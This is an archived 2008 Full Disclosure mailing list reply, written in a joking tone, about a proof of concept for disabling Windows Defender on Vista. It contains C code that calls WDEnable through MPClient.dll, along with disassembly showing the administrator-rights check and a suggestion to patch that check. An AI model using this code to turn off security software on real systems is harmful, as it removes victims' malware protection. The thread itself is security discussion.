Full Disclosure mailing list archives
Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code
From: "Fredrick Diggle" <fdiggle () gmail com>
Date: Wed, 14 May 2008 23:10:42 -0500
HAHAHA Fredrick Diggle thinks that skyout was running his el8 assembly machine program in a debugger running as administrator :( opps... for the kids to test at home fred diggle has written easier program which isn't as el8 (fred doesn't know the computer assembly language as he is lowly zoo worker) but also isn't as dumb #include "windows.h" #define INFINITY_PLUS_1 0 // important DO NOT CHANGE /* by defining the diggle license agreement secret sauce you are agreeing that fredrick diggle is far better than you will ever be and also that you will give him all your money please */ #ifdef DIGGLE_LICENSE_AGREEMENT typedef int (WINAPI *diggle)(BOOL hippo); #endif int main() { HMODULE dlliggle; diggle WDEnable; dlliggle = LoadLibrary(L"C:\\Program Files\\Windows Defender\\MPClient.dll"); WDEnable = (diggle) GetProcAddress(dlliggle, (LPCSTR) "WDEnable"); WDEnable((BOOL)INFINITY_PLUS_1); return INFINITY_PLUS_1; // <- THIS IS CRITICAL } doesn't work if fred is not admin :( <- sad face Why could this be when skyout says it will?!?!?!?! from MPClient.dll WDEnable() ... .text:30C12858 loc_30C12858: ; CODE XREF: WDEnable(x)+16Ej .text:30C12858 call _MpFeatureDisable@8 ; THis is teh call that Matters ++++++ ... MpFeatureDisable() ... .text:30C0C8A9 lea eax, [ebp+var_4] .text:30C0C8AC push eax ; int .text:30C0C8AD push ebx ; int .text:30C0C8AE call _IsAdminOrSystem@8 ; IsAdminOrSystem(x,x) Opps :(((((((( ... so Fredrick thought in Freds mind, well gee golly this checks if fred is an admin but I can control this code eh (disclaimer: fred is not canadian)... so what happens if fred makes this code do "mov DWORD PTR SS:[EBP-4], 1" instead of that nasty admin checking? well fred discovered that it basically calls into NdrClientCall2() which can be viewed for pleasure here -> http://msdn.microsoft.com/en-us/library/aa374215(VS.85).aspx see ----v ClientMpDisableFeature() ... .text:30C14FBA lea eax, [ebp+arg_0] .text:30C14FBD push eax .text:30C14FBE push offset byte_30C01AFE ; pFormat .text:30C14FC3 push offset pStubDescriptor ; pStubDescriptor .text:30C14FC8 call _NdrClientCall2 <- HELLo you devilish monkey ... and although fred did not reverse this nastiness today he assures skyout that 1) MPClient.dll checks for admin privs (not that it matters) 2) even if it didn't this call wouldn't let you turn off defender without admin privs, if you want to find a way start ^--- there 3) his children will be plentiful with full heads of hair (but one might potentially be a midget... :D) Fred diggle must go see if the hippo brushed his teeth before going to bed now good bye friends! On Wed, May 14, 2008 at 3:49 PM, Peter Ferrie <peter.ferrie () gmail com> wrote:
my friend Izee from the EOF-Project(.net) team has coded a simple PoC code, that demonstrates how to disable the Windows Defender on Vista (tested with and without SPs on x86/x64) using its own API made for it.Does he realise that he must be Admin first? Then he he can just disable the service, or delete the files, or whatever. Using the API doesn't gain much here. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [Wired Security/EOF] Disable Windows Defender (Vista) PoC code skyout.fd (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Fredrick Diggle (May 14)
- Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code skyout.fd (May 15)
- Re: [Wired Security/EOF] Disable Windows Defender(Vista) PoC code Fredrick Diggle (May 16)
- Re: [Wired Security/EOF] Disable Windows Defender (Vista) PoC code Peter Ferrie (May 14)